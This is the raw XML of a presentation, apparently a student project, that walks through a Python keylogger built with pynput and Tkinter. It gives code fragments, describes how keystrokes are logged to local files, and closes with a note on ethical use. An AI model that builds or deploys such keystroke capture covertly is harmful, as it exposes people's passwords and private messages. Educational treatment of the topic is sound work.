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sldIdLst>
    <p:sldId id="270" r:id="rId5"/>
    <p:sldId id="267" r:id="rId6"/>
    <p:sldId id="281" r:id="rId7"/>
    <p:sldId id="257" r:id="rId8"/>
    <p:sldId id="293" r:id="rId9"/>
    <p:sldId id="294" r:id="rId10"/>
    <p:sldId id="282" r:id="rId11"/>
    <p:sldId id="283" r:id="rId12"/>
    <p:sldId id="284" r:id="rId13"/>
    <p:sldId id="285" r:id="rId14"/>
    <p:sldId id="286" r:id="rId15"/>
    <p:sldId id="287" r:id="rId16"/>
    <p:sldId id="288" r:id="rId17"/>
    <p:sldId id="289" r:id="rId18"/>
    <p:sldId id="290" r:id="rId19"/>
    <p:sldId id="291" r:id="rId20"/>
    <p:sldId id="292" r:id="rId21"/>
    <p:sldId id="277"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75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="456"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4-05-10T00:56:46.536" idx="1">
    <p:pos x="6879" y="669"/>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pynput.readthedocs.io/en/latest/index.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.python.org/3/index.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9950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4466391" y="4011875"/>
            <a:ext cx="8951134" cy="1680357"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bodoni MT" panose="02070603080606020203" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>keylogger</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Bodoni MT" panose="02070603080606020203" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3315503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A6786-A2A7-14C6-4552-DCFDB8E546DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="834887" y="159026"/>
            <a:ext cx="11211339" cy="6463308"/>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def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>start_keylogger</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global listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    listener = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>keyboard.Listener</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on_press</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on_press</a:t>
            </a:r>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on_release</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on_release</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listener.start</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label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</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start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(state='disabled')</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stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(state='normal')</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def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>stop_keylogger</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global listener</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listener.stop</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label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(text="Keylogger stopped.")</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start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(state='normal')</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stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(state='disabled')</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root = Tk()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>root.title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>("Keylogger")</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label = Label(root, text='Click "Start" to begin keylogging.')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(anchor=CENTER)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>label.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN"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38671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5C5434-CA5C-F80F-0619-9676619D848D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1020417" y="397565"/>
            <a:ext cx="10137913" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>start_button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> = Button(root, text="Start", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>start_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(side=LEFT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>stop_button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> = Button(root, text="Stop", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, state='disabled')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>stop_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(side=RIGHT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>root.geometry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>("250x250")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>root.mainloop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN"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2037472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FE0364-F670-10E6-2467-7F4FEF4089C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1482436" y="359021"/>
            <a:ext cx="9227128" cy="707886"/>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After executing this program a GUI will open like below mentioned.  It will shows the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>keylogger tracker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>to be start.  Then click </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> to begin. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02380DCC-10A8-9BEC-1F25-6D2FC0CE6DB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="675" t="1602" r="886" b="815"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2676525" y="1466850"/>
            <a:ext cx="6162675" cy="5032130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:schemeClr val="tx1">
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93974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E6EE3A-D9BF-D840-C610-6C0556440575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="371"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1174750" y="1489075"/>
            <a:ext cx="10682310" cy="4949825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:schemeClr val="tx1">
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE6B4328-D7BA-59CF-8E32-CB173499876B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1009650" y="419100"/>
            <a:ext cx="10143259" cy="707886"/>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After clicking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> it generate a two new files named as “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>key_log.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>” and “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>key_log.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>” in the program saved location.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="425525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6E49FF-0CCC-661B-1D95-0D636FA390E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1205345" y="609600"/>
            <a:ext cx="9947564" cy="707886"/>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Then it move to next window like below mentioned. It will start tracking and store the information(which we are typing in our keyboard) to the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>keylogger.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>” file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0F1AFCE-F87A-6E31-74D7-4B1A6D923FDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="1167" t="1133" r="724" b="1676"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2262187" y="1990725"/>
            <a:ext cx="7534955" cy="4768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964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BBF30F-FDCD-A19E-B4E6-09C4438E10B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4436212" y="2535975"/>
            <a:ext cx="4219575" cy="2686050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FE20D2B-5F5D-2942-E6E8-B566B60C2686}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1451429" y="493486"/>
            <a:ext cx="8926285" cy="400110"/>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Then create a text file and write some words or sentence.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C7BFEDD-0CF9-1377-1A57-485C7E969304}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="541"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1835239" y="1394547"/>
            <a:ext cx="9478238" cy="47339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6785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4B758-8E81-FF34-E243-D1DD315CC6B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="1392" t="827" r="640" b="1301"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2965450" y="1739899"/>
            <a:ext cx="6826250" cy="434112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77ED4D1-D8E9-9812-E570-A4F88E5FE615}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1346200" y="355600"/>
            <a:ext cx="8902700" cy="707886"/>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After finishing the document and click </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> in keylogger window.  Then it shows the stopped message.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="258907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AE6DFA-ADC4-C593-45DF-E6D9CE575334}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="-1" r="215" b="717"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="1559821"/>
            <a:ext cx="10452100" cy="5168977"/>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DCD6557-2357-6F03-C600-D6F36C905E91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1193800" y="609600"/>
            <a:ext cx="9309100" cy="707886"/>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The generated file from the keylogger tracker software.  It contains what we typed in the keyboard.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256191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TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="1861456"/>
            <a:ext cx="10160000" cy="212006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keylogger software is a tool that records all the keystrokes made on a computer or device. It can capture sensitive information like passwords, credit card numbers, and personal messages without the user knowing. While it may have legitimate uses like monitoring children's online activity or tracking employee productivity, it can also be used maliciously to steal private information. Therefore, it's essential to use such software responsibly and ethically, ensuring it's only used with proper consent and for lawful purposes.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="169908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ea typeface="+mn-lt"/>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959428" y="2171700"/>
            <a:ext cx="988422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Software Foundation.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3.9.7 Documentation. Retrieved from </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="sng"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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://docs.python.org/3/index.html</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="sng"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GUI Programming by Example: Learn to create modern GUIs using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Tkinter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David Love,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Packt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Publishing, 2018.</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Pynput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Documentation.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Retrieved from </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="sng"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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://pynput.readthedocs.io/en/latest/index.html</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="sng"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JSON — JavaScript Object Notation.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Retrieved from </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="sng"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rPr>
              <a:t>https://www.json.org/json-en.html</a:t>
            </a:r>
          </a:p>
